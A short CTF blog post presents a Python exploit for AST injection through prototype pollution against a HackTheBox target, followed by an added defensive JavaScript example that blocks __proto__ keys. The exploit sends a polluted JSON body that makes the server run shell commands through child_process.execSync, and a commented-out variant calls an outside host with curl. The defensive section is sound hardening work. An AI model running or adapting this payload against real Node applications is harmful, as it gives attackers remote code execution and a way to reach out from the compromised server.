AST Injection Example

Nov. 29, 2020 // echel0n

Here is an AST Injection example. The exploit relied on the error output.
It was used in a HackTheBox CTF.
For further information, please consider reading this article:
https://blog.p6.is/AST-Injection/
Have a nice day!

    #!/usr/bin/env python
    import requests

    TARGET_URL = 'http://docker.hackthebox.eu:32561'

    # make pollution
    r = requests.post(TARGET_URL + '/api/submit', json={
        "artist.__proto__.prototype.type": "Program",
        "artist.__proto__.name": "Haigh",
        # "__proto__.name": "process.mainModule.require('child_process').execSync(`curl 'http://devilinside.me:8080/'`)",
        "artist.__proto__.body": [{
            "type": "MustacheStatement",
            "path": 0,
            "params": [{
                "type": "NumberLiteral",
                "value": "process.mainModule.require('child_process').execSync(`sh -c 'whoami'`)"
            }],
            "loc": {
                "start": 0,
                "end": 0
            }
        }]
    })

    # execute
    print(r.text)
    r = requests.get(TARGET_URL)
    # print(r.text)
    print("done")
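
The defensive side of the same payload, as an added example that is not part of the original post: assuming the server expands dotted JSON keys into nested objects, the naive expansion below pollutes Object.prototype, while the hardened one rejects __proto__, constructor and prototype segments. The function names and the sample body are constructed for illustration.

```javascript
// Added example, not from the original post. Assumption: the server expands
// dotted keys ("a.b.c") into nested objects before using the data.
const FORBIDDEN = new Set(['__proto__', 'constructor', 'prototype']);
// Naive expansion: plain property access lets "__proto__" resolve to
// Object.prototype, so the final write lands on every object in the process.
function unflattenNaive(flat) {
  const out = {};
  for (const [path, value] of Object.entries(flat)) {
    const segs = path.split('.');
    let node = out;
    for (const seg of segs.slice(0, -1)) {
      if (typeof node[seg] !== 'object' || node[seg] === null) node[seg] = {};
      node = node[seg];
    }
    node[segs[segs.length - 1]] = value;
  }
  return out;
}

// Hardened expansion: reject dangerous segments and build null-prototype
// objects so there is no inherited chain to walk into.
function unflattenSafe(flat) {
  const out = Object.create(null);
  for (const [path, value] of Object.entries(flat)) {
    const segs = path.split('.');
    const bad = segs.find((s) => FORBIDDEN.has(s));
    if (bad) throw new Error(`rejected segment "${bad}" in key "${path}"`);
    let node = out;
    for (const seg of segs.slice(0, -1)) {
      if (typeof node[seg] !== 'object' || node[seg] === null) node[seg] = Object.create(null);
      node = node[seg];
    }
    node[segs[segs.length - 1]] = value;
  }
  return out;
}
// Constructed body shaped like the post's keys, with a harmless value.
const sample = { 'artist.name': 'Haigh', 'artist.__proto__.body': [{ type: 'MustacheStatement' }] };

function demo() {
  unflattenNaive(sample);
  const pollutedByNaive = Array.isArray({}.body); // unrelated object inherits "body"
  delete Object.prototype.body; // undo the pollution
  let safeError = null;
  try { unflattenSafe(sample); } catch (e) { safeError = e.message; }
  return { pollutedByNaive, safeError, pollutedBySafe: 'body' in {} };
}
console.log(demo());
```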